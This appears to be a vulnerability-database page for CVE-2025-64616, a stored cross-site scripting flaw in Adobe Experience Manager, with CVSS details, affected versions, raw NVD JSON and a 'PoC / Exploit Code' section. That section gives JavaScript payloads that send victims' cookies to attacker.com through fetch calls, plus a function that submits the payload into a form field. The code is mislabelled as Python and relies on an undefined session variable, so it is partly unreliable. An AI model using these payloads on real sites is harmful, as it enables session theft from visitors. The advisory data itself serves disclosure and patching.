Security Vulnerability Report
中文
CVE-2025-64616 CVSS 5.4 MEDIUM

CVE-2025-64616

Published: 2025-12-10 19:16:26
Last Modified: 2025-12-12 17:31:39

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23及之前所有版本
Adobe Experience Manager 6.5.22
Adobe Experience Manager 6.5.21
Adobe Experience Manager 6.5.20
Adobe Experience Manager 6.5.19
Adobe Experience Manager 6.5.18
Adobe Experience Manager 6.5.17
Adobe Experience Manager 6.5.16及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64616 Adobe Experience Manager Stored XSS PoC // Affected: Adobe Experience Manager <= 6.5.23 // Step 1: Identify vulnerable form field // Navigate to AEM form page that allows user input const formEndpoint = 'https://target-aem.com/content/forms/af/vulnerable-form.html'; // Step 2: Inject XSS payload into form field // Example payload - Cookie stealing const xssPayload = `<script> fetch('https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie)) </script>`; // Alternative payload using event handler const altPayload = `<img src=x onerror="fetch('https://attacker.com/steal?data='+btoa(document.cookie))">`; // Step 3: Submit the form with malicious payload async function exploitAEMXSS(targetUrl, formFieldName, payload) { const response = await fetch(targetUrl, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'login-token=' + userSessionToken }, body: `${formFieldName}=${encodeURIComponent(payload)}` }); return response.ok; } // Step 4: When victim views the page, XSS executes automatically // The malicious script runs in victim's browser context console.log('CVE-2025-64616 PoC - Adobe Experience Manager Stored XSS'); console.log('Payload will execute when any user visits the infected page');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64616", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:26.420", "lastModified": "2025-12-12T17:31:38.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}